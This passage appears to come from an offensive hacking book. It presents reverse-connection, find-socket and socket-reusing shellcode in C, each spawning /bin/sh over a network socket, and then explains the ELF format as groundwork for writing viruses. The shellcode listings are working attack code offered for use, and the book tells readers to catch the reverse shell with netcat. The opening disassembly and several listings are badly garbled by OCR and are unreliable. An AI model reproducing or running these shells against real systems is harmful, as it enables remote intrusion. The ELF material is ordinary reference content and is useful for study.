804848e: bO 3f 
s048490: 4] 

SO048491: cd 80 
8048493: bo 3f 
60468495: 41 

BO48496: cd 80 
8048498; 88 56 
BOqb49b: #9 76 
B8O04849e; B7 £3 
B80484a0: #a 4b 
BO484a3;: bO Ob 
8O0484a5: cd 80 


O80484a7 <line>: 


B0484a7: eb 89 
B0484ac: 2f 
8O0484ad: 62 69 
BO484b0: 2f 
BO0484b1: 73 68 





Oc 


08 
08 


10 
3€ 
08 
ig 
46 
14 


Oe 
O08 


Oe 


Oc 
10 


07 
Oc 


0c 


2x 


10 
14 


ff ff 


das 
jae 
eax, Oxc(tesi) 
Pax 

teax, Ox8(tesi) 
Ox8 (%esi), %ecx 
SOx66, Sal 
S0x80 

$ebu 

$0x10, OxlO(%esi) 
tbe, Oxl4 (%esi) 
tal, Ox8 (esi) 
eax, teax 
teax, bedx 
teax, Oxl8(*esi} 
50x50, %al 

tax, Oxl6(%esi) 
Oxl4(%esi), tecx 
%ecx, Oxc(*esi) 
Ox8(%esi), tecx 
$066, tal 
50x80 

tebe, Oxc(#esi) 
%eDx 

$ebx 

20x66, tal 
20x80 

tedx, Oxc(tesi) 
$edx, Ox10(%esi) 
70x66, tal 
'ebDx 

50x80 

tal, ‘tbl 

2Ox3f, tal 
‘ecx, eCK 
$0x80 

SOx3f, tal 
$ecx 

50x80 

SOx3f, tal 
$ecx 

50x80 

#d1, Ox? (esi) 
tesi, Oxc(tesi) 
tesi, tebx 

Oxec (Sebx), tecx 
S0xb, tal 
50x80 


8048435 <start> 
tebp, Onde (%ecx) 


804651b <gcc2 compiled. + Oxlb> 
From now on, all shellcodes are presented only in their C implementation, and you will have to convert them to hexadecimal format yourself, following the example in this section. Ready-made hexadecimal versions of practically any shellcode can also be found on the Internet.


14.4.2. Reverse Connection Shellcode


The essence of the reverse connection shellcode is that the connection is initiated not by the hacker but by the remote shellcode itself. That is, after a reverse connection shellcode successfully executes on the remote machine, it connects to one of the ports on the hacker's machine. This type of shellcode is in essence a connect-back backdoor, which was considered in Chapter 11. The source code for a reverse connection shellcode is shown in Listing 14.13. The IP address and the port to which the connection is to be made must be specified in the shellcode. In the example, 127.0.0.1 and 666 are used as the IP address and the port, respectively. The connection from this shellcode is accepted by running the netcat utility with the -l and -p switches.





Listing 14.13. Reverse connection shellcode (reverseshell.c) 





#include<unistd.h> 
finclude<sys/socket.h> 
tinclude<netinet/in.h> 


int soc, rc; 
struct sockaddr in serv addr; 


int main () 
1 
serv addr.sin family = AF_INET; 
‘v_addr.sin_addr.s_ addr = inet_addr("127.0.0.1"); 
‘V_addr.sin port = htons (666); 
oc=socket (AF INET, SOCK STREAM, 0); 
¢ = connect(soc, (struct sockaddr*)&serv addr, sizeof(serv addr)); 
dup? (soc, 0); 
dup2 (soc, 1); 
dup2(soc, 2)3 
exec] ("/bin/sh", "sh™, QO); 







14.4.3. Find Shellcode 


The find shellcode does not establish a new TCP/IP connection but uses an existing one. This makes it the most effective way of bypassing a firewall, because commands are sent over the same connection that was used to send the shellcode to the vulnerable host. To use “its” connection, the shellcode must know the connection's socket descriptor, which it finds out using the getpeername() function. This function returns the remote address and port of the connection associated with the given descriptor, or an error if the descriptor is not associated with any connection. Because descriptors are small integers, the shellcode needs only a short time to try all of them in a loop. The shellcode recognizes “its” connection among all those it tries by checking the remote (source) port, that is, the port on the hacker's machine from which the shellcode was sent to the vulnerable host. The source code for the shellcode is shown in Listing 14.14.





Listing 14.14. Find shellcode (findshell.c) 


include <stdlib.h> 
f#include <sys/socket.h> 
finclude <netinet/in.h> 
#include <stdio.h> 


ndefine HACK PORT 1313 


int main(} 
{ 
Int i; 13 
struct sockaddr in sin; 
j = sizeoft(struct sockaddr in); 
for(i = Gs i < 2567 itt) { 
if(getpeername (1, &Sin, &)) < W) 
continue; 
1f(Sin.sin port = htons (HACK PORT) } 
break; 


} 


For(j = O7 j < 27 34+) 
dupz(j, 1)? 


exec] ("/bin/sh", "sh", WUOLL); 





14.4.4. Socket-Reusing Shellcode 


This shellcode also makes it possible to bypass firewalls efficiently by rebinding an already open port on the vulnerable host and intercepting all subsequent connections to this port. The only difference between the port-binding shellcode and the socket-reusing shellcode is the setsockopt(soc, SOL_SOCKET, SO_REUSEADDR, (char*)&n_reuse, sizeof(n_reuse)) line in the latter, which sets the SO_REUSEADDR option on the socket. This option allows the socket to be bound to an already opened port. The source code for a socket-reusing shellcode is shown in Listing 14.15.
Listing 14.15. Socket-reusing shellcode (reuseshell.c)





#include <stdio.h> 
#include <stdlib.h> 
finclude <netinet/in.h> 
finclude <sys/types.h> 
finclude <sys/socket.h> 
finclude <unistd.h> 


int soc, -cli; 

int sins; 

struct sockaddr_in serv_addr; 
struct sockaddr in cli_addr; 


int main({) 


{ 


int n_ reuse = 200; 
sins = Ox10; 
if(fork() == 0) 


{ 





serv addr.sin family = AF_INET; 

serv_addr.sin_addr.s_addr = INADDR_ANY; 

serv addr.sin port = htons (31337); 

soc = socket (AF INET, SOCK STREAM, 0); 

setsockopt (soc, SOL SOCKET, SO REUSEADDR, (char*)&n_reuse, sizeof(n_reuse)); 
bind(sec, (struct sockaddr *)&serv_ addr, sizeoft(serv_addr)); 
listen(soc, 1); 

cli = accept(soc, (struct sockaddr *)4&cli addr, &sins); 

dup2 (cli, 0); 

dupe {cili, 1); 

dup2(cli, 2); 

exec] ( "/bin/sh", "eh". O); 

close (cli); 

exit(d); 





PART IV: SELF-REPLICATING HACKING SOFTWARE





Chapter 15: The ELF File Format 





The main format of Linux executable files is the executable and linkable format (ELF). Anyone aspiring to write self-replicating software (primarily viruses) must have a thorough knowledge of this format. There are numerous sources for the latest ELF specification (version 1.2) on the Internet, for example, http://x86.ddj.com/ftp/manuals/tools/elf.pdf.

In this chapter, I only give a brief presentation of the specification and explore the organization of ELF files using a specific example.


15.1. File Organization 


In the ELF format specification, the organization of an executable ELF file is presented as 
shown in Listing 15.1. 


Listing 15.1. ELF file organization as given in the specification 


ELF header
Program header table
Segment 1
Segment 2
...
Section header table (optional)
A more accurate representation is shown in Listing 15.2.





Listing 15.2. Truer representation of the ELF file organization 





ELF header
Program header table
Segment 1
    Section 1
    Section 2
    ...
    Section n
Segment 2
    Section 1
    Section 2
    ...
    Section n
...
Segment n
    Section 1
    Section 2
    ...
    Section n
Section header table (optional)
Symbol table (optional)
String table (optional)





Thus, an executable file consists of an ELF header, a program header table, one or more 
segments, an optional section header table, an optional symbol table, and an optional string 
table. Each segment can be divided into sections. 


15.2. Main Structures 


All definitions of the ELF format structures are stored in the /usr/include/elf.h header file. 

The position of the ELF header in a file is fixed; the position of each remaining compo- 
nent is determined by the information in the header. The structure of an ELF header is shown 
in Listing 15.3. 





Listing 15.3. The ELF header structure 





#define EI_NIDENT (16)

typedef struct
{
  unsigned char e_ident[EI_NIDENT]; /* Signature (0x7f, 'E', 'L', 'F') and
                                       other information */
  Elf32_Half    e_type;             /* File type */
  Elf32_Half    e_machine;          /* Hardware architecture required
                                       for the file */
  Elf32_Word    e_version;          /* Object file version */
  Elf32_Addr    e_entry;            /* Virtual address of the program's
                                       entry point */
  Elf32_Off     e_phoff;            /* Program header table's offset
                                       from the start of the file */
  Elf32_Off     e_shoff;            /* Section header table's offset
                                       from the start of the file */
  Elf32_Word    e_flags;            /* Processor-specific flags,
                                       not used in the i386 architecture */
  Elf32_Half    e_ehsize;           /* Size of the ELF header in bytes */
  Elf32_Half    e_phentsize;        /* Size in bytes of one entry in the
                                       program header table */
  Elf32_Half    e_phnum;            /* Number of entries in the program
                                       header table */
  Elf32_Half    e_shentsize;        /* Size in bytes of one entry in the
                                       section header table */
  Elf32_Half    e_shnum;            /* Number of entries in the section
                                       header table */
  Elf32_Half    e_shstrndx;         /* Section header table index of the
                                       section holding section names */
} Elf32_Ehdr;
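To make the structure concrete, here is a minimal sketch (not taken from the specification or from any particular tool) that copies an Elf32_Ehdr out of a file image already loaded into memory and checks its signature and class. It relies only on definitions from <elf.h> (ELFMAG, SELFMAG, EI_CLASS, ELFCLASS32). The function name read_elf32_header() is hypothetical, and the code assumes that the file's byte order matches the host's, which holds for the i386 files examined in this chapter.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: copies the ELF header from an in-memory file image
   and checks that it describes a 32-bit ELF file.
   Returns 1 on success, 0 otherwise. Assumes host byte order. */
int read_elf32_header(const unsigned char *image, size_t len, Elf32_Ehdr *out)
{
    assert(image != NULL && out != NULL);

    /* The header always starts at offset 0 of the file. */
    if (len < sizeof(Elf32_Ehdr))
        return 0;

    /* memcpy avoids unaligned access through a cast pointer. */
    memcpy(out, image, sizeof(Elf32_Ehdr));

    /* Signature: 0x7f 'E' 'L' 'F' (ELFMAG is "\177ELF", SELFMAG is 4). */
    if (memcmp(out->e_ident, ELFMAG, SELFMAG) != 0)
        return 0;

    /* EI_CLASS tells 32-bit (ELFCLASS32) files from 64-bit ones. */
    if (out->e_ident[EI_CLASS] != ELFCLASS32)
        return 0;

    /* A consistent header reports its own size in e_ehsize. */
    return (size_t)out->e_ehsize == sizeof(Elf32_Ehdr);
}
```

To use it on a real file, read the file into a buffer (for example, with fopen() and fread()) and pass the buffer and its length; e_phoff and e_shoff then lead to the program and section header tables.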





A program header table is an array of structures (table records) that specify how a process image is to be created from the segments. Listing 15.4 shows the structure of a record. Most segments are copied (mapped) into memory and become the corresponding segments of the running process, for example, its code or data segments.








Listing 15.4. The structure of a program header table record 





typedef struct
{
  Elf32_Word p_type;    /* Segment type */
  Elf32_Off  p_offset;  /* Segment's offset from the start of the file */
  Elf32_Addr p_vaddr;   /* Virtual address of the segment */
  Elf32_Addr p_paddr;   /* Physical address of the segment */
  Elf32_Word p_filesz;  /* Size of the segment in the file */
  Elf32_Word p_memsz;   /* Size of the segment in memory */
  Elf32_Word p_flags;   /* Flags */
  Elf32_Word p_align;   /* Value to which segments are aligned */
} Elf32_Phdr;
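Because the program header table is a plain array that starts at file offset e_phoff, with entries e_phentsize bytes apart, walking it takes only a loop. The sketch below counts the entries of a given type (PT_LOAD, PT_DYNAMIC, and so on). count_segments() is a hypothetical helper; as before, the file image is assumed to be in memory and in host byte order.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: returns how many program header table entries of a
   32-bit ELF image have p_type == type, or -1 if the table does not fit
   inside the image. Assumes host byte order. */
int count_segments(const unsigned char *image, size_t len, Elf32_Word type)
{
    Elf32_Ehdr eh;
    int count = 0;

    assert(image != NULL);
    if (len < sizeof eh)
        return -1;
    memcpy(&eh, image, sizeof eh);

    /* Each entry must be at least as large as the structure we copy. */
    if (eh.e_phnum > 0 && (size_t)eh.e_phentsize < sizeof(Elf32_Phdr))
        return -1;

    for (Elf32_Half i = 0; i < eh.e_phnum; i++) {
        /* Entry i lives at e_phoff + i * e_phentsize. */
        size_t off = (size_t)eh.e_phoff + (size_t)i * eh.e_phentsize;
        Elf32_Phdr ph;

        if (off > len || len - off < sizeof ph)
            return -1;
        memcpy(&ph, image + off, sizeof ph);
        if (ph.p_type == type)
            count++;
    }
    return count;
}
```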





The optional section header table describes the sections into which the segments are divided. Listing 15.5 shows the structure of a section header table record. Sections whose names start with a period are special system sections. It is advisable not to prefix application section names with a period, to avoid conflicts with system sections. The following are some typical system sections: .text (holds the program code), .data (holds initialized data), .bss (holds uninitialized data), .init (holds initialization procedures), .fini (holds finalization procedures), and .plt (holds the procedure linkage table used in dynamic linking). The loader knows nothing about sections, ignores their attributes, and simply loads the entire segment into memory.





Listing 15.5. The structure of a section header table record 


typedef struct
{
  Elf32_Word sh_name;       /* Section name (string table index) */
  Elf32_Word sh_type;       /* Section type */
  Elf32_Word sh_flags;      /* Section flags */
  Elf32_Addr sh_addr;       /* Address of the section's first byte */
  Elf32_Off  sh_offset;     /* Section's offset from the start of the file */
  Elf32_Word sh_size;       /* Section size in bytes */
  Elf32_Word sh_link;       /* Link to another section */
  Elf32_Word sh_info;       /* Additional information about the section */
  Elf32_Word sh_addralign;  /* Value to which sections are aligned */
  Elf32_Word sh_entsize;    /* Size of one entry if the section holds a table */
} Elf32_Shdr;
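Section names are not stored in the Elf32_Shdr records. Instead, sh_name is an offset into the string table held by the section whose index is e_shstrndx in the ELF header. The following sketch uses that rule to look a section up by name. find_section() is a hypothetical name, and the function checks bounds so that a malformed image cannot make it read past the buffer.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: finds the section called `name` in a 32-bit ELF image
   held in memory. Returns 1 and copies its header to *out if found, else 0.
   Assumes the image uses the host's byte order. */
int find_section(const unsigned char *image, size_t len,
                 const char *name, Elf32_Shdr *out)
{
    Elf32_Ehdr eh;
    Elf32_Shdr strtab;

    assert(image != NULL && name != NULL && out != NULL);
    if (len < sizeof eh)
        return 0;
    memcpy(&eh, image, sizeof eh);
    if (eh.e_shnum == 0 || eh.e_shstrndx >= eh.e_shnum ||
        (size_t)eh.e_shentsize < sizeof(Elf32_Shdr))
        return 0;

    /* Header of the section-name string table (index e_shstrndx). */
    size_t soff = (size_t)eh.e_shoff + (size_t)eh.e_shstrndx * eh.e_shentsize;
    if (soff > len || len - soff < sizeof strtab)
        return 0;
    memcpy(&strtab, image + soff, sizeof strtab);
    if (strtab.sh_offset > len || strtab.sh_size > len - strtab.sh_offset)
        return 0;
    const char *names = (const char *)image + strtab.sh_offset;

    for (Elf32_Half i = 0; i < eh.e_shnum; i++) {
        size_t off = (size_t)eh.e_shoff + (size_t)i * eh.e_shentsize;
        Elf32_Shdr sh;

        if (off > len || len - off < sizeof sh)
            return 0;
        memcpy(&sh, image + off, sizeof sh);

        /* sh_name is an offset into the string table; the name must end
           with a NUL byte inside the table. */
        if (sh.sh_name >= strtab.sh_size ||
            memchr(names + sh.sh_name, '\0', strtab.sh_size - sh.sh_name) == NULL)
            continue;
        if (strcmp(names + sh.sh_name, name) == 0) {
            *out = sh;
            return 1;
        }
    }
    return 0;
}
```

Calling find_section(image, len, ".text", &sh) on a real executable would give the .text header, whose sh_addr and sh_offset correspond to the Addr and Off columns printed by readelf -S.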





The symbol table and the string table together are known as symbolic information. The symbol table is an array of structures; the definition of one of these structures is given in Listing 15.6. The records in the symbol table are of a fixed length, so symbol names are not stored in the records themselves: the st_name field holds an index into the string table, where the name is kept. The symbolic information is not required for the file to run and can be removed using the strip command.





Listing 15.6. The structure of a symbol table record 





typedef struct
{
  Elf32_Word    st_name;   /* Symbol's name (string table index) */
  Elf32_Addr    st_value;  /* Symbol's value (e.g., an address) */
  Elf32_Word    st_size;   /* Symbol's size */
  unsigned char st_info;   /* Symbol's type and binding */
  unsigned char st_other;  /* Symbol's scope (visibility) */
  Elf32_Section st_shndx;  /* Section index */
} Elf32_Sym;
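The st_info field packs two values. The symbol's binding is stored in the upper four bits and its type in the lower four. <elf.h> provides the ELF32_ST_BIND, ELF32_ST_TYPE, and ELF32_ST_INFO macros for splitting and combining them. The sketch below decodes st_info into the labels that readelf prints and resolves st_name through a string table. The function names are hypothetical, and only the most common binding and type values are handled.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helpers mirroring readelf's Bind and Type columns
   for the most common values only. */
const char *symbol_bind_name(unsigned char info)
{
    switch (ELF32_ST_BIND(info)) {   /* upper 4 bits of st_info */
    case STB_LOCAL:  return "LOCAL";
    case STB_GLOBAL: return "GLOBAL";
    case STB_WEAK:   return "WEAK";
    default:         return "OTHER";
    }
}

const char *symbol_type_name(unsigned char info)
{
    switch (ELF32_ST_TYPE(info)) {   /* lower 4 bits of st_info */
    case STT_NOTYPE:  return "NOTYPE";
    case STT_OBJECT:  return "OBJECT";
    case STT_FUNC:    return "FUNC";
    case STT_SECTION: return "SECTION";
    case STT_FILE:    return "FILE";
    default:          return "OTHER";
    }
}

/* Resolves st_name through a string table of strtab_size bytes. Returns NULL
   if the index is out of range or the name is not NUL-terminated. */
const char *symbol_name(const Elf32_Sym *sym, const char *strtab, size_t strtab_size)
{
    assert(sym != NULL && strtab != NULL);
    if (sym->st_name >= strtab_size)
        return NULL;
    if (memchr(strtab + sym->st_name, '\0', strtab_size - sym->st_name) == NULL)
        return NULL;
    return strtab + sym->st_name;
}
```

For instance, a global function such as main has st_info equal to ELF32_ST_INFO(STB_GLOBAL, STT_FUNC), which these helpers report as GLOBAL and FUNC.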


15.3. Exploring the Internal Structure 


The internal structure of any ELF file can be explored using the readelf system utility. As an 
example, write a simple program (see Listing 15.7) and explore its structure using readelf. 
Listing 15.7. A simple program for exploration practice





#include <stdio.h>

int main()
{
    printf("Hello, World!\n");
    return 0;
}





Compile the program and run readelf with the -h option: 


# gcc hello.c -o hello
# ./hello
Hello, World!
# readelf -h ./hello
ELF Header:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF32
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Intel 80386
  Version:                           0x1
  Entry point address:               0x8048360
  Start of program headers:          52 (bytes into file)
  Start of section headers:          10640 (bytes into file)
  Flags:                             0x0
  Size of this header:               52 (bytes)
  Size of program headers:           32 (bytes)
  Number of program headers:         6
  Size of section headers:           40 (bytes)
  Number of section headers:         30
  Section header string table index: 27

You will see the ELF header of the hello file. The most interesting information in this output is the Entry point address value, which is the virtual address at which the program starts executing. As you will see later, it is located at the beginning of the .text section.

Running the utility with the -l option outputs the program header table:


# readelf -l ./hello

Elf file type is EXEC (Executable file)
Entry point 0x8048360
There are 6 program headers, starting at offset 52

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  PHDR           0x000034 0x08048034 0x08048034 0x000c0 0x000c0 R E 0x4
  INTERP         0x0000f4 0x080480f4 0x080480f4 0x00013 0x00013 R   0x1
      [Requesting program interpreter: /lib/ld-linux.so.2]
  LOAD           0x000000 0x08048000 0x08048000 0x004f7 0x004f7 R E 0x1000
  LOAD           0x0004f8 0x080494f8 0x080494f8 0x000e8 0x00100 RW  0x1000
  DYNAMIC        0x000540 0x08049540 0x08049540 0x000a0 0x000a0 RW  0x4
  NOTE           0x000108 0x08048108 0x08048108 0x00020 0x00020 R   0x4

 Section to Segment mapping:
  Segment Sections...
   00
   01     .interp
   02     .interp .note.ABI-tag .hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.got .rel.plt .init .plt .text .fini .rodata
   03     .data .eh_frame .ctors .dtors .got .dynamic .bss
   04     .dynamic
   05     .note.ABI-tag


As you can see, there are only six segments in the program. The utility also listed the sec- 
tions in each segment. 
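The section-to-segment mapping can be approximated by comparing address ranges. A loaded section belongs to a segment if [sh_addr, sh_addr + sh_size) lies inside [p_vaddr, p_vaddr + p_memsz). This is a simplified sketch, and section_in_segment() is a hypothetical name. readelf itself also checks file offsets and special cases such as empty and TLS sections, so its results can differ from this check in edge cases.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>

/* Hypothetical, simplified test: does the section's address range lie
   within the segment's memory range? Ignores file offsets and the special
   cases readelf handles (empty sections, TLS, etc.). */
int section_in_segment(const Elf32_Shdr *sh, const Elf32_Phdr *ph)
{
    assert(sh != NULL && ph != NULL);

    /* Sections without SHF_ALLOC (.comment, .symtab, ...) are never loaded. */
    if (!(sh->sh_flags & SHF_ALLOC))
        return 0;

    /* 64-bit arithmetic so that address + size cannot wrap around. */
    unsigned long long s_start = sh->sh_addr;
    unsigned long long s_end = s_start + sh->sh_size;
    unsigned long long p_start = ph->p_vaddr;
    unsigned long long p_end = p_start + ph->p_memsz;

    return s_start >= p_start && s_end <= p_end;
}
```

With the numbers for this program, .text (address 0x08048360, size 0x160) falls inside the first LOAD segment (0x08048000, size 0x4f7), while .data (0x080494f8) falls only inside the second one. This agrees with segments 02 and 03 in the mapping above.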

Running the utility with the -S option outputs the section header table:

# readelf -S ./hello
There are 30 section headers, starting at offset 0x2990:

Section Headers:
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .interp           PROGBITS        080480f4 0000f4 000013 00   A  0   0  1
  [ 2] .note.ABI-tag     NOTE            08048108 000108 000020 00   A  0   0  4
  [ 3] .hash             HASH            08048128 000128 000034 04   A  4   0  4
  [ 4] .dynsym           DYNSYM          0804815c 00015c 000080 10   A  5   1  4
  [ 5] .dynstr           STRTAB          080481dc 0001dc 000095 00   A  0   0  1
  [ 6] .gnu.version      VERSYM          08048272 000272 000010 02   A  4   0  2
  [ 7] .gnu.version_r    VERNEED         08048284 000284 000030 00   A  5   1  4
  [ 8] .rel.got          REL             080482b4 0002b4 000008 08   A  4  13  4
  [ 9] .rel.plt          REL             080482bc 0002bc 000028 08   A  4  11  4
  [10] .init             PROGBITS        080482e4 0002e4 000018 00  AX  0   0  4
  [11] .plt              PROGBITS        080482fc 0002fc 000060 04  AX  0   0  4
  [12] .text             PROGBITS        08048360 000360 000160 00  AX  0   0 16
  [13] .fini             PROGBITS        080484c0 0004c0 00001e 00  AX  0   0  4
  [14] .rodata           PROGBITS        080484e0 0004e0 000017 00   A  0   0  4
  [15] .data             PROGBITS        080494f8 0004f8 000010 00  WA  0   0  4
  [16] .eh_frame         PROGBITS        08049508 000508 000004 00  WA  0   0  4
  [17] .ctors            PROGBITS        0804950c 00050c 000008 00  WA  0   0  4
  [18] .dtors            PROGBITS        08049514 000514 000008 00  WA  0   0  4
  [19] .got              PROGBITS        0804951c 00051c 000024 04  WA  0   0  4
  [20] .dynamic          DYNAMIC         08049540 000540 0000a0 08  WA  5   0  4
  [21] .sbss             PROGBITS        080495e0 0005e0 000000 00   W  0   0  1
  [22] .bss              NOBITS          080495e0 0005e0 000018 00  WA  0   0  4
  [23] .stab             PROGBITS        00000000 0005e0 0007a4 0c     24   0  4
  [24] .stabstr          STRTAB          00000000 000d84 001967 00      0   0  1
  [25] .comment          PROGBITS        00000000 0026eb 000144 00      0   0  1
  [26] .note             NOTE            00000000 00282f 000078 00      0   0  1
  [27] .shstrtab         STRTAB          00000000 0028a7 0000e9 00      0   0  1
  [28] .symtab           SYMTAB          00000000 002e40 0004e0 10     29  58  4
  [29] .strtab           STRTAB          00000000 003320 00022c 00      0   0  1
Key to Flags:
  W (write), A (alloc), X (execute), M (merge), S (strings)
  I (info), L (link order), G (group), x (unknown)
  O (extra OS processing required) o (OS specific), p (processor specific)


As you can see, the entry point address 0x08048360 is the virtual address of the start of the 
.text code section. 
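The same relationship can be checked against the file offsets. Within a PT_LOAD segment, a virtual address maps to the file offset vaddr - p_vaddr + p_offset, provided it falls within the first p_filesz bytes. The rest of the segment (for example, .bss) is zero-filled in memory and has no contents in the file. The sketch below applies this rule. vaddr_to_offset() is a hypothetical helper, and the test values are taken from the readelf -l output of hello shown earlier.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>

/* Hypothetical helper: translates a virtual address to a file offset using
   one PT_LOAD program header. Returns 1 and stores the offset on success,
   0 if the address is not backed by file contents of this segment. */
int vaddr_to_offset(const Elf32_Phdr *ph, Elf32_Addr vaddr, Elf32_Off *offset)
{
    assert(ph != NULL && offset != NULL);
    if (ph->p_type != PT_LOAD)
        return 0;
    /* Only the first p_filesz bytes of the segment come from the file. */
    if (vaddr < ph->p_vaddr || vaddr - ph->p_vaddr >= ph->p_filesz)
        return 0;
    *offset = vaddr - ph->p_vaddr + ph->p_offset;
    return 1;
}
```

With the first LOAD segment of hello (offset 0, address 0x08048000), the entry point 0x08048360 maps to file offset 0x360, which is exactly the Off value that readelf -S reports for .text.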
Running the utility with the -s option outputs the symbol table: 
# readelf -s ./hello

Symbol table '.dynsym' contains 8 entries:
   Num:    Value  Size Type    Bind   Vis      Ndx Name
     0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND
     1: 0804830c   129 FUNC    WEAK   DEFAULT  UND __register_frame_info@GLIBC_2.0 (2)
     2: 0804831c   172 FUNC    WEAK   DEFAULT  UND __deregister_frame_info@GLIBC_2.0 (2)
     3: 0804832c   202 FUNC    GLOBAL DEFAULT  UND __libc_start_main@GLIBC_2.0 (2)
     4: 0804833c    50 FUNC    GLOBAL DEFAULT  UND printf@GLIBC_2.0 (2)
     5: 0804834c   157 FUNC    WEAK   DEFAULT  UND __cxa_finalize@GLIBC_2.1.3 (3)
     6: 080484e4     4 OBJECT  GLOBAL DEFAULT   14 _IO_stdin_used
     7: 00000000     0 NOTYPE  WEAK   DEFAULT  UND __gmon_start__

Symbol table '.symtab' contains 78 entries:
   Num:    Value  Size Type    Bind   Vis      Ndx Name
     0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND
     1: 080480f4     0 SECTION LOCAL  DEFAULT    1
     2: 08048108     0 SECTION LOCAL  DEFAULT    2
     3: 08048128     0 SECTION LOCAL  DEFAULT    3
     4: 0804815c     0 SECTION LOCAL  DEFAULT    4
     5: 080481dc     0 SECTION LOCAL  DEFAULT    5
     6: 08048272     0 SECTION LOCAL  DEFAULT    6
     7: 08048284     0 SECTION LOCAL  DEFAULT    7
     8: 080482b4     0 SECTION LOCAL  DEFAULT    8
     9: 080482bc     0 SECTION LOCAL  DEFAULT    9
    10: 080482e4     0 SECTION LOCAL  DEFAULT   10
    11: 080482fc     0 SECTION LOCAL  DEFAULT   11
    12: 08048360     0 SECTION LOCAL  DEFAULT   12
    13: 080484c0     0 SECTION LOCAL  DEFAULT   13
    14: 080484e0     0 SECTION LOCAL  DEFAULT   14
    15: 080494f8     0 SECTION LOCAL  DEFAULT   15
    16: 08049508     0 SECTION LOCAL  DEFAULT   16
    17: 0804950c     0 SECTION LOCAL  DEFAULT   17
    18: 08049514     0 SECTION LOCAL  DEFAULT   18
    19: 0804951c     0 SECTION LOCAL  DEFAULT   19
    20: 08049540     0 SECTION LOCAL  DEFAULT   20
    21: 080495e0     0 SECTION LOCAL  DEFAULT   21
    22: 080495e0     0 SECTION LOCAL  DEFAULT   22
    23: 00000000     0 SECTION LOCAL  DEFAULT   23
    24: 00000000     0 SECTION LOCAL  DEFAULT   24
    25: 00000000     0 SECTION LOCAL  DEFAULT   25
    26: 00000000     0 SECTION LOCAL  DEFAULT   26
    27: 00000000     0 SECTION LOCAL  DEFAULT   27
    28: 00000000     0 SECTION LOCAL  DEFAULT   28
   ...

Symbols are the names of functions (for example, main, _start, and printf), source files (hello.c, crtstuff.c), and other objects. Moreover, you can see that the symbols are stored in two tables, held in the .dynsym and .symtab sections.


Use the strip utility to delete the symbol information from the hello file and check the modified contents again:

# strip ./hello

# readelf -s ./hello

Symbol table '.dynsym' contains 8 entries:
  Num:    Value  Size Type    Bind   Vis      Ndx Name
    0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND
    1: 0804830c   129 FUNC    WEAK   DEFAULT  UND __register_frame_info@GLIBC_2.0 (2)
    2: 0804831c   172 FUNC    WEAK   DEFAULT  UND __deregister_frame_info@GLIBC_2.0 (2)
    3: 0804832c   202 FUNC    GLOBAL DEFAULT  UND __libc_start_main@GLIBC_2.0 (2)
    4: 0804833c    50 FUNC    GLOBAL DEFAULT  UND printf@GLIBC_2.0 (2)
    5: 0804834c   157 FUNC    WEAK   DEFAULT  UND __cxa_finalize@GLIBC_2.1.3 (3)
    6: 080484e4     4 OBJECT  GLOBAL DEFAULT   14 _IO_stdin_used
    7: 00000000     0 NOTYPE  WEAK   DEFAULT  UND __gmon_start__


The .symtab section has been deleted, but the .dynsym section remains. This section holds the dynamic linking information for the system libraries the program uses. The strip utility does not touch it, because the program cannot run properly without it.
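You do not strictly need readelf to check which symbol sections a binary carries. The section names can be read directly from the ELF section header table. The following is a minimal sketch and is not taken from the book. The has_section() helper is hypothetical. The sketch assumes a 64-bit ELF file in the host's byte order, so the 32-bit hello above would need the Elf32_ types instead. It also does not handle extended section numbering.

```c
#include <elf.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper (not from the book): returns 1 if the ELF file at
   `path` contains a section called `name`, 0 if it does not, and -1 if the
   file cannot be read or is not a 64-bit ELF file in host byte order. */
static int has_section(const char *path, const char *name)
{
    Elf64_Ehdr eh;
    Elf64_Shdr *sh = NULL;
    const Elf64_Shdr *strtab;
    char *names = NULL;
    int result = -1;

    FILE *f = fopen(path, "rb");
    if (f == NULL)
        return -1;

    /* Validate the ELF header: magic bytes, class, section header table. */
    if (fread(&eh, sizeof eh, 1, f) != 1 ||
        memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 ||
        eh.e_ident[EI_CLASS] != ELFCLASS64 ||
        eh.e_shentsize != sizeof(Elf64_Shdr) ||
        eh.e_shnum == 0 || eh.e_shstrndx >= eh.e_shnum)
        goto out;

    /* Read every section header. */
    sh = calloc(eh.e_shnum, sizeof *sh);
    if (sh == NULL || fseek(f, (long)eh.e_shoff, SEEK_SET) != 0 ||
        fread(sh, sizeof *sh, eh.e_shnum, f) != eh.e_shnum)
        goto out;

    /* Read the section-name string table (.shstrtab); strip keeps it. */
    strtab = &sh[eh.e_shstrndx];
    names = malloc(strtab->sh_size + 1);
    if (names == NULL || fseek(f, (long)strtab->sh_offset, SEEK_SET) != 0 ||
        fread(names, 1, strtab->sh_size, f) != strtab->sh_size)
        goto out;
    names[strtab->sh_size] = '\0';

    /* Compare each section's name with the one we are looking for. */
    result = 0;
    for (int i = 0; i < eh.e_shnum; i++) {
        if (sh[i].sh_name < strtab->sh_size &&
            strcmp(names + sh[i].sh_name, name) == 0) {
            result = 1;
            break;
        }
    }

out:
    free(names);
    free(sh);
    fclose(f);
    return result;
}
```

On an unstripped 64-bit build, has_section("./hello", ".symtab") should return 1, and after strip it should return 0. For a dynamically linked program, ".dynsym" is found in both cases.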


Chapter 16: Viruses 





